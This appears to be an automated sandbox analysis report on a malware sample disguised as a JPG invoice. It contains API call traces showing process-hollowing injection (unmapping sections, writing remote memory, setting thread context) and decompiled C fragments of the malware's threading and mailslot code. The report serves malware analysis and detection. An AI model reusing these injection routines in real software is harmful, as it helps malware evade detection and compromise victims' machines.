Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
lstrcpy.KERNEL32(00000000), ref: 002E4BE0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305

Similarity

Total matches: 305
API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
String ID:
API String ID: 4193297829-0
Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string

Similarity

Total matches: 183
API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
String ID: <
API String ID: 1457465641-4251816714
Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85

APIs

memset.NTDLL ref: 002E2CEE
CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

wsprintfW.USER32 ref: 002E2DAE
ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
CoUninitialize.OLE32 ref: 002E2DF7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Strings

<, xrefs: 002E2DC2

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file

Similarity

Total matches: 320
API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
String ID:
API String ID: 3756146440-0
Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0

APIs

CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
CloseHandle.KERNEL32(00000000), ref: 002E4B65

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory

Similarity

Total matches: 162
API ID: CreateProcessGetLastErrorHeapFreememset
String ID: D
API String ID: 1501718689-2746444292
Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8

APIs

memset.NTDLL ref: 002E13B5

Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
GetLastError.KERNEL32(00000001), ref: 002E1422
HeapFree.KERNEL32(00000000,00000000), ref: 002E1433

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

Strings

D, xrefs: 002E13CE

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Similarity

Total matches: 377
API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
String ID:
API String ID: 1827773359-0
Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
CloseHandle.KERNEL32(000000FF), ref: 002E4AF0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Similarity

Total matches: 388
API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 4069891769-0
Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e

APIs

memset.NTDLL ref: 002E21A3

Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036

ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Similarity

Total matches: 409
API ID: GetLastError$memcpymemset
String ID:
API String ID: 1724464136-0
Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215

APIs

memset.NTDLL ref: 002E3750
memcpy.NTDLL ref: 002E3778

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 68262

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	3F602782259014F0253ECDEDFEF4D261
Total matches:	37
Initial Analysis Report:	Open
Initial sample Analysis ID:	68262
Initial sample SHA 256:	3CCBE128847999E971BF2194D595C7D211A4EB32C8BD53401702A83B3AB73B70
Initial sample name:	27Scansione_F24_2018_07.JPG.exe

Similar Executed Functions

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native

Similarity

Total matches: 84
API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
String ID:
API String ID: 1776017925-0
Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc

APIs

NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

NtClose.NTDLL(00000000), ref: 002E31D4
NtClose.NTDLL(002E618C), ref: 002E31DD

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Similarity

Total matches: 233
API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
String ID:
API String ID: 405287775-0
Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959

APIs

memset.NTDLL ref: 002E38A2
GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Similarity

Total matches: 229
API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3367774474-0
Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd

APIs

NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
SetLastError.KERNEL32(00000000), ref: 002E3EA7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Similarity

Total matches: 236
API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 1449157707-0
Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa

APIs

NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Similarity

Total matches: 238
API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3946382534-0
Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536

APIs

NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Similarity

Total matches: 95
API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
String ID:
API String ID: 2699342322-0
Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82

C-Code - Quality: 100%

			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs

CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9

Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9

TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
CloseHandle.KERNEL32(?), ref: 004016F0
GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
CloseHandle.KERNEL32(?), ref: 00401704
GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Similarity

Total matches: 95
API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
String ID: \\.\mailslot\msl0
API String ID: 1001206095-622273203
Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981

C-Code - Quality: 94%

			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs

CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
GetLastError.KERNEL32 ref: 00401126
Sleep.KERNEL32(00000064), ref: 00401131

Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
memset.NTDLL ref: 004011C8

Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213

CloseHandle.KERNEL32(?), ref: 004011E4

Strings

\\.\mailslot\msl0, xrefs: 00401113

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Similarity

Total matches: 182
API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
String ID:
API String ID: 1756712956-0
Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b

APIs

PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
StrStrIW.SHLWAPI(00000000), ref: 002E12E4
HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Similarity

Total matches: 143
API ID: lstrlenmemset$GetProcAddressLoadLibrary
String ID: ~
API String ID: 3655391705-1707062198
Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11

